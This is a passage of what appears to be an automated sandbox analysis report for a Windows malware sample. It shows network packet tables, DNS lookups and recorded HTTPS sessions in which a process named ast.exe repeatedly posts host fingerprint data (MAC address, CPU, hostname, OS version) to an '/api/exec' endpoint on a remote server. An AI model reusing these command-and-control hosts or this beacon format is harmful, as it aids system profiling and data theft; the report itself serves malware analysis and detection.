                                                                                                                                Nov 19, 2024 18:57:01.588382959 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.588412046 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.588521957 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.588548899 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.588588953 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.588660955 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.671804905 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.671859980 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.672024012 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.673192024 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.673208952 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.494504929 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.494587898 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.496068954 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.496084929 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.496335983 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.496944904 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.497344017 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.497375011 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.497425079 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.497467041 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.497499943 CET44350172212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.497519016 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.497555017 CET50172443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.541528940 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.541595936 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.541721106 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.542115927 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:02.542135000 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.340455055 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.340579987 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.343147039 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.343158007 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.344026089 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.344734907 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.346398115 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.346431017 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.346532106 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.346573114 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.346745014 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.346842051 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.711065054 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.711097002 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.711472988 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.712064981 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.712088108 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.625700951 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.625993013 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.627180099 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.627185106 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.627429008 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.628146887 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629214048 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629245996 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629338026 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629363060 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629364014 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629373074 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629405975 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629482031 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629482031 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.639210939 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.639267921 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.639496088 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.640136003 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.640156031 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.352483988 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.352643013 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.353913069 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.353924990 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.354154110 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.355797052 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356637001 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356637001 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356667995 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.356756926 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.356781006 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.356827974 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356853008 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452207088 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452270031 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.452455044 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452939987 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452955961 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.200073957 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.200181007 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.593000889 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.593034983 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.594007015 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.595134020 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.596398115 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.596471071 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.596664906 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.596811056 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.596877098 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.614372015 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.614460945 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.614798069 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.615560055 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.615576029 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.340353012 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.340462923 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.342298031 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.342315912 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.342674971 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.344506025 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.348150015 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.348193884 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.348345041 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.348380089 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.348429918 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.595267057 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.651210070 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.651302099 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.651386023 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.652343035 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.652379990 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:09.499391079 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:09.499486923 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.084408045 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.084454060 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.084954977 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.085752010 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.086649895 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.086668968 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.087124109 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.087182045 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.087276936 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.087321997 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.087369919 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.087389946 CET50190443192.168.2.4212.193.169.65

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 19, 2024 18:56:11.422700882 CET5635753192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:11.430294037 CET53563571.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.253089905 CET6346353192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:32.260734081 CET53634631.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.261862993 CET5650953192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:32.309228897 CET53565091.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.437783003 CET6082453192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:32.460732937 CET53608241.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.373982906 CET5064953192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:37.417490005 CET53506491.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.413002014 CET6112653192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:42.450165033 CET53611261.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.364444971 CET6286053192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:47.394306898 CET53628601.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.402069092 CET5901453192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:52.753168106 CET53590141.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.404206038 CET5250753192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:57.438035011 CET53525071.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.379303932 CET5390753192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:57:02.404982090 CET53539071.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:07.419150114 CET5518953192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:57:08.366883039 CET53551891.1.1.1192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Nov 19, 2024 18:56:11.422700882 CET192.168.2.41.1.1.10xe3eeStandard query (0)id.xn--80akicokc0aablc.xn--p1aiA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:32.253089905 CET192.168.2.41.1.1.10xe82Standard query (0)id.xn--80akicokc0aablc.xn--p1aiA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:32.261862993 CET192.168.2.41.1.1.10x93dStandard query (0)trs011.xn--80akicokc0aablc.xn--p1aiA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:32.437783003 CET192.168.2.41.1.1.10x64f2Standard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:37.373982906 CET192.168.2.41.1.1.10x951Standard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:42.413002014 CET192.168.2.41.1.1.10x8a98Standard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:47.364444971 CET192.168.2.41.1.1.10xe046Standard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:52.402069092 CET192.168.2.41.1.1.10xf228Standard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:57.404206038 CET192.168.2.41.1.1.10x1a8Standard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:57:02.379303932 CET192.168.2.41.1.1.10xd8cfStandard query (0)crypto-st.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:57:07.419150114 CET192.168.2.41.1.1.10xede9Standard query (0)crypto-st.artA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Nov 19, 2024 18:56:11.430294037 CET1.1.1.1192.168.2.40xe3eeNo error (0)id.xn--80akicokc0aablc.xn--p1ai212.193.169.65A (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:32.260734081 CET1.1.1.1192.168.2.40xe82No error (0)id.xn--80akicokc0aablc.xn--p1ai212.193.169.65A (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:32.309228897 CET1.1.1.1192.168.2.40x93dNo error (0)trs011.xn--80akicokc0aablc.xn--p1ai195.19.105.66A (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:32.460732937 CET1.1.1.1192.168.2.40x64f2Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:37.417490005 CET1.1.1.1192.168.2.40x951Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:42.450165033 CET1.1.1.1192.168.2.40x8a98Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:47.394306898 CET1.1.1.1192.168.2.40xe046Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:52.753168106 CET1.1.1.1192.168.2.40xf228Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:56:57.438035011 CET1.1.1.1192.168.2.40x1a8Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:57:02.404982090 CET1.1.1.1192.168.2.40xd8cfName error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 19, 2024 18:57:08.366883039 CET1.1.1.1192.168.2.40xede9Name error (3)crypto-st.artnonenoneA (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • id.xn--80akicokc0aablc.xn--p1ai:443

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449836212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:13 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:13 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.449844212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:14 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:14 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.449852212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:14 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:14 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
                                                                                                                                2024-11-19 17:56:14 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.449860212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:15 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:15 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.449884212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:18 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:18 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.449897212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:19 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
